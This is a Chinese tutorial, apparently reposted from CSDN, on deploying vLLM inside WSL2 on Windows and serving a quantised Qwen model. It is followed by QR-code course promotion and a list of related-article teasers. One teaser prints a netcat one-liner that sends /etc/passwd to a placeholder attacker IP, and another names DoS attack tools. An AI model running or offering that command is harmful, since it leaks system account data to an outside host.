WSL2+vLLM部署大模型,收藏这篇就够了!大模型部署

我看到有些小伙伴在评论区留言想要学习一下vLLM框架在windows上本地部署大模型的方法。

其实vLLM框架本身是不支持Windows系统的,但是我们可以把vLLM部署在WSL2中。这里科普一下什么是WSL,WSL它其实就像是一个运行在windows中的linux系统。我们无法在原生的Windows系统中运行vLLM,所以只能把它放到WSL中去进行部署,而WSL 2则是WSL的最新版本。

小天建议大家尽量确保自己电脑的系统版本不要太旧,最好是比较新的win10或者win11系统,官方对于版本的要求如下。

大家如果对自己的版本号有疑惑则可以点击快捷键“win+r”,然后输入‘winver’后回车即可看到自己系统的版本号。

下面的教程中的操作都是在我这台搭配了3060显卡的win11电脑中进行的,因为每个人的系统版本和电脑环境都有很大的差异,所以下面的任何一步如果有问题你可以在文末向我咨询。

在整个教程中,最容易出错的就是WSL2的安装了,如果你之前已经正确安装过了,那么你通过vLLM本地部署模型的任务就已经完成了百分之五十。

在后期的win10以及win11系统中,wsl命令已经系统自带了,所以我们只需要下载对应的Linux发行版然后安装即可。

微软官网下载地址:https://learn.microsoft.com/zh-cn/windows/wsl/install-manual?source=recommendations#step-4—download-the-linux-kernel-update-package

下载好后,先不要急着安装,在控制面板中找到程序下的启用或关闭Windows功能的选项。

然后确保下面的服务功能是开启的状态,首先要开启的是适用于Linux的Windows子系统这个选项。

然后要开启的是“虚拟机平台 Virtual Machine Platform”功能 ,这里要注意的是,这里的显示可能只是中文的“虚拟机平台”或者如下图意义的纯英文的Virtual Machine Platform:

开启之后需要重启电脑,然后找到刚刚下载好的Linux发行版的文件,这里下载的是24.04版本的Ubuntu。大家可以根据自己的需求来选择。

一直在更新,更多的大模型学习和面试资料已经上传带到CSDN的官方了,有需要的朋友可以扫描下方二维码免费领取【保证100%免费】👇👇

然后我们直接双击这个文件,即可完成安装。

如果你发现双击文件没有反应,则可以重启一下试试,或者打开Hyper-V这个Windows功能。

在安装的过程中,系统会提示你创建用户和密码,这个根据自己的情况来填写即可,比如我这里的用户名就是’天欣实验室’的缩写。

配置好用户密码后会自动的进入到你安装的系统之中。后续你可以输入’wsl -l -v’来查看已经安装的Linux版本。

然后使用命令’wsl -d 系统名’的方式进入到对应的Linux系统中,就像下面这样。

进入之后我们运行下面的命令来更换后续安装软件的地址为国内地址,这样更加快速且无需配置网络(命令要一条一条输入)。

sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list sudo sed -i 's/security.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list sudo apt update

因为wsl会和windows主机共用一个显卡驱动,所以你可以在wsl或者cmd窗口中输入命令:‘nvidia-smi’,如果有类似下面的输出,则代表你已经有了显卡驱动。

如果没有则可以到英伟达的官网下载最新的驱动,地址如下:

https://www.nvidia.cn/software/nvidia-app/

然后再一条一条的输入以下命令,你就可以成功安装vllm了,这里的命令的作用我通过注释的方式写出来了,如果哪一步有问题可以在评论区留言或者直接向我咨询。

# 1. 安装venv支持包和pip sudo apt install -y python3-pip sudo apt install -y python3.12-venv # 2. 创建虚拟环境 python3 -m venv ~/vllm-venv # 3. 激活虚拟环境 source ~/vllm-venv/bin/activate # 4. 安装uv pip install uv -i https://mirrors.aliyun.com/pypi/simple/ # 5. 设置下载超时 export UV_HTTP_TIMEOUT=360 # 6. 使用uv安装vllm和魔搭社区库 uv pip install vllm -i https://mirrors.aliyun.com/pypi/simple/ uv pip install modelscope -i https://mirrors.aliyun.com/pypi/simple/

(因为ubuntu24版本自带了python3.12,所以这里无需下载python了)

因为wsl的文件也是放在windows系统中的,所以我们可以直接对wsl中的linux系统做文件操作,你可以在文件资源管理器中输入’\wsl$’ 查看所有发行版本的文件夹。

然后你需要在魔搭社区找到你想要下载的模型,比如我这里选择的是Qwen3-VL-8B-Instruct-AWQ-4bit模型,在对应的模型主页复制ID。

关于魔搭社区的介绍和模型名称的理解,大家可以看我之前的一篇文章:

Ollama × 魔搭社区:超简单的大模型本地部署方案

然后在你对应Linux版本的 ‘/home/用户名’ 文件夹下(这里的用户名是你上面安装linux系统时候创建的用户名),新建一个名字为down.py的python脚本,脚本很简单,只有俩行代码,这个脚本的作用便是下载魔搭社区中你所指定的模型。

from modelscope import snapshot_download snapshot_download( '需要替换的模型ID', cache_dir="./model" )

然后再wsl中,输入命令’cd /home/用户名’ 转跳到对应的目录当中,然后输入’chmod a+x down.py’确保其运行权限正确,随后使用’python down.py’的命令来启动模型下载任务(注意要在上面步骤中激活的虚拟环境中运行)。

模型下载好之后,同样在’/home/用户名’ 文件夹下新建一个名称为’run.sh’的脚本来作为vllm的启动脚本,然后同样使用’chmod a+x run.sh’确保权限正确,脚本的示例代码如下:

vllm serve /home/txsys/model/cpatonn-mirror/Qwen3-VL-4B-Instruct-AWQ-4bit \ --served-model-name Qwen3-VL-4B \ --max-model-len 8192 \ --max-num-seqs 1 \ --trust-remote-code \ --port 6006

其中vllm serve后面跟着的是你模型的下载路径,其余的启动参数还有很多,你可以根据自己的电脑配置和模型参数让AI来帮你生成即可,这里简单说一下上面列出来的参数含义:

served-model-name:模型名称

max-model-len:模型最大上下文tokens

max-num-seqs:最大并发

trust-remote-code:允许模型自己执行代码

port:服务的启动端口

我们直接在对应目录中输入’./run.sh’即可通过vllm启动大模型了,出现下面的字样则代表启动成功。

这里多说一嘴,如果你的vllm安装好了,模型也下载好了,但是通过命令启动不起来,这大概率是你vllm启动参数的问题,你可以让AI帮你调整修改一下。

我们下次开启wsl后,再使用vllm运行大模型的步骤就很清晰了,首先进入到虚拟开发环境,然后切换到对应目录,最后运行run脚本即可,具体命令如下图:

成功运行vllm服务后,我们就剩下了最后一步:通过接口调用AI,首先需要在wsl下的linux系统中输入:‘ip -a’ 来查看linux系统的内网IP:

因为运行脚本中的端口设置为了6006,所以我们可以通过下面的接口调用AI,具体的调用代码大家可以使用AI来写:

如果你成功输出了AI的回复,那就说明vllm的部署没有问题,到此你就成功完成了大模型的本地部署!

最后唠两句

为什么AI大模型成为越来越多程序员转行就业、升职加薪的首选

很简单,这些岗位缺人且高薪

智联招聘的最新数据给出了最直观的印证:2025年2月,AI领域求职人数同比增幅突破200% ,远超其他行业平均水平;整个人工智能行业的求职增速达到33.4%,位居各行业榜首,其中人工智能工程师岗位的求职热度更是飙升69.6%。

AI产业的快速扩张,也让人才供需矛盾愈发突出。麦肯锡报告明确预测,到2030年中国AI专业人才需求将达600万人,人才缺口可能高达400万人,这一缺口不仅存在于核心技术领域,更蔓延至产业应用的各个环节。

那0基础普通人如何学习大模型 ?

深耕科技一线十二载,亲历技术浪潮变迁。我见证那些率先拥抱AI的同行,如何建立起效率与薪资的代际优势。如今,我将积累的大模型面试真题、独家资料、技术报告与实战路线系统整理,分享于此,为你扫清学习困惑,共赴AI时代新程。

我整理出这套 AI 大模型突围资料包【允许白嫖】:

  • ✅从入门到精通的全套视频教程

  • ✅AI大模型学习路线图(0基础到项目实战仅需90天)

  • ✅大模型书籍与技术文档PDF

  • ✅各大厂大模型面试题目详解

  • ✅640套AI大模型报告合集

  • ✅大模型入门实战训练

这份完整版的大模型 AI 学习和面试资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

①从入门到精通的全套视频教程

包含提示词工程、RAG、Agent等技术点

② AI大模型学习路线图(0基础到项目实战仅需90天)

全过程AI大模型学习路线

③学习电子书籍和技术文档

市面上的大模型书籍确实太多了,这些是我精选出来的

④各大厂大模型面试题目详解

⑤640套AI大模型报告合集

⑥大模型入门实战训练

如果说你是以下人群中的其中一类,都可以来学习人工智能,找到高薪工作,一次小小的“投资”换来的是终身受益!

应届毕业生‌:无工作经验但想要系统学习AI大模型技术,期待通过实战项目掌握核心技术。

零基础转型‌:非技术背景但关注AI应用场景,计划通过低代码工具实现“AI+行业”跨界‌。

业务赋能 ‌突破瓶颈:传统开发者(Java/前端等)学习Transformer架构与LangChain框架,向AI全栈工程师转型‌。

👉获取方式:
有需要的小伙伴,可以保存图片到wx扫描二v码免费领取【保证100%免费】🆓

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1124421.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

NIVIDIA高性能计算CUDA笔记(三) cuFFT的简介及实现案例

NIVIDIA高性能计算CUDA笔记(三) cuFFT的简介及实现案例 1. cuFFT库的简介(Introduction of cuFFT libaray) ​ Fourier变换是数字信号处理领域一个很重要的数学变换,它用来实现将信号实现将信号从时域到频域的变换…

旋转曲面接缝处问题

想要实现曲面纹理贴图功能,但是发现曲面表面一旦偏移,接缝处就会出现明显缝隙一开始想通过动态偏移的方式,根据纹理偏移的高度相应的缩小旋转半径。细想发现由于纹理不同,实际偏移的高度也不同。这会导致旋转曲面接不上后面了解到…

Langchain 太重?试试 Google ADK!搭建 Agent 新思路,上下文管理效率翻倍,教程来了!

Agent 的状态数据分两种:会话内的临时上下文和跨会话的长期知识。 前者是“用户刚才说了什么”、“工具返回了什么结果”,会话结束就该清空。后者是“用户三个月前的购买记录”、“历史工单的解决方案”,需要持久化并在未来对话中智能召回。…

Dakota: Design Analysis Kit for Optimization and Terascale Applications

文章目录一、Dakota 核心功能介绍1. **优化(Optimization)**2. **不确定性量化(UQ)**3. **参数研究(Parameter Studies)**4. **模型校准与验证(Calibration & Validation)**二、…

省电费之外,这些隐藏价值让企业稳赚不赔!

工厂主们常为日益攀升的电费成本而辗转难眠,特别是随着生产规模扩大,高峰期电价飙升的压力如影随形。储能系统,这个被称作 "工业充电宝" 的创新方案,已悄然成为企业降本增效的关键助力。它不仅能为工厂省下大笔电费&…

互联网大厂Java求职面试实录:从Spring Boot到微服务架构的技术深潜

互联网大厂Java求职面试实录:从Spring Boot到微服务架构的技术深潜 本文通过一个互联网大厂Java求职者谢飞机与面试官的三轮面试问答,深入探讨Java核心技术栈及相关业务场景,帮助读者系统了解Java面试中常见的技术点。面试覆盖Spring Boot、微…

别再说RAG过时了!Context Engineering系列一:掌握这10个上下文处理技巧,效果翻倍!

RAG效果不及预期,试试这10个上下文处理优化技巧 **对大部分开发者来说,搭一个RAG或者agent不难,怎么把它优化成生产可用的状态最难。 在这个过程中,检索效率、准确性、成本、响应速度,都是重点关注问题。 那么&…

LangChain 杀疯了!DeepAgents 横空出世,长任务稳健不崩,高可控简直无敌!

任务规划文件系统访问子agent委托 现如今,Agent 所需要执行的任务长度每几个月翻一番,长周期任务通常涉及数十次工具调用,这会带来成本和可靠性方面的问题。 那么,要如何解决? deepagents 是 LangChain 推出的开源框…

大模型多Agent实战教程(非常详细):Agno与LangGraph全方位对比,从原理到生产部署全解析!

今天还是聊聊生产级agent怎么搭这回事。 前面几期内容,我们聊了agent 常见的坑有哪些,memory怎么管理,还有一些rerank细节,今天从部署层面看看怎么选一个不错的agent框架。 现如今,针对复杂场景,多agent架…

高级DoS攻击技术深度解析:Slowloris、SYN Flood与Hping3实战

前言 在上一篇文章中,我们介绍了DoS/DDoS攻击的基础理论以及SSL洪水、慢速POST等攻击技术。本文将继续深入探讨更多高级攻击手段,包括经典的Slowloris攻击、SYN Flood洪水攻击、DNS放大攻击,以及强大的Hping3工具的多种应用场景。这些技术是…

(85页PPT)以人为本创新驱动构建未来校园智慧后勤云平台(附下载方式)

篇幅所限,本文只提供部分资料内容,完整资料请看下面链接 (85页PPT)以人为本创新驱动构建未来校园智慧后勤云平台.pptx_PPT格式医疗信息化方案资源-CSDN下载 资料解读:以人为本创新驱动构建未来校园智慧后勤云平台 详…

嵌入式现代C++教程: 构造函数优化:初始化列表 vs 成员赋值

构造函数优化:初始化列表 vs 成员赋值 在嵌入式 C 项目中,我们很容易把精力放在“看得见”的地方:中断、DMA、时序、缓存命中率、Flash/RAM 占用……而对于构造函数这种“看起来只执行一次”的代码,往往下意识地放松了警惕。 但实…

别再给OpenAI送钱了!大模型自主化部署全方案,本地部署流程详解,省钱又安全!

“ 模型本地部署是运维人员的基本技能,也是开发人员的基本技能。” 在大模型应用中,数据安全问题是很多企业关注的重点,特别是政务,金融,医疗等领域,对数据安全性有着更高的要求。 因此,这时使…

加密数据传输技术

威胁场景 假设攻击者控制的Kali系统被入侵,需要通过加密方式传输敏感数据以避免被防火墙拦截。 Base64文本传输 场景1:Linux到Windows 目标机器(Linux): cat /etc/passwd | base64 | nc -nv [黑客IP] 3333 -q 1攻击者&…

链表专题(九):应用篇的无冕之王——「LRU 缓存机制」

场景想象: 你有一个书架(缓存),容量有限(比如只能放 3 本书)。 规则是 “最近最少使用 (Least Recently Used)” 淘汰: 读取:如果你读了一本书,它就变得“新鲜”了&…

嵌入式现代C++:移动语义不是玄学,是资源转移的工程实践

嵌入式现代C&#xff1a;移动语义不是玄学&#xff0c;是资源转移的工程实践 假设你在写一个USB数据传输层&#xff0c;需要把一个4KB的DMA缓冲区从接收队列传递到处理线程。你可能会这样写&#xff1a; class DMABuffer {std::array<uint8_t, 4096> data;size_t length;…

大模型Agent实战教程(非常详细):深入理解ReAct架构,彻底搞懂稳定性难题!

“ 大模型的能力有限&#xff0c;因此在智能体处理复杂任务时&#xff0c;我们需要通过提示词告诉模型复杂任务的处理方法。” 最近在研究模型部署和Langchain新版本框架时&#xff0c;突然想到一个问题&#xff0c;就是ReAct Agent智能体问题。 ReAct Agent智能体的运行原理…

重塑安全认知:图解物理与环境安全如何托起整个信息安全“金字塔”

信息安全&#xff1a;物理与环境安全技术. 传统上的物理安全也称为 实体安全 &#xff0c;是指包括 环境、设备和记录介质在内的所有支持网络信息系统运行的硬件的总体安全&#xff0c;是网络信息系统安全、可靠、不间断运行的基本保证&#xff0c;并且确保在信息进行加工处理…

Context Pruning全攻略:RAG效果提升的关键,带你从零掌握高质量上下文剪枝技术!

Context Pruning如何结合rerank&#xff0c;优化RAG上下文&#xff1f; 现如今&#xff0c;LLM的上下文窗口长度正在经历爆发式增长。 翻开LLM Leaderboard&#xff0c;可以发现顶级模型的上下文长度已经陆续突破了1M tokens&#xff0c;并且这个数字还在不断刷新。 但问题也…

如何避免性能测试的常见陷阱

性能测试的核心价值与挑战 性能测试是软件质量保障的关键环节&#xff0c;旨在评估系统在高负载、高并发下的响应能力、稳定性和可扩展性。对于测试从业者而言&#xff0c;它能暴露潜在瓶颈&#xff08;如数据库延迟或代码低效&#xff09;&#xff0c;预防线上故障。然而&…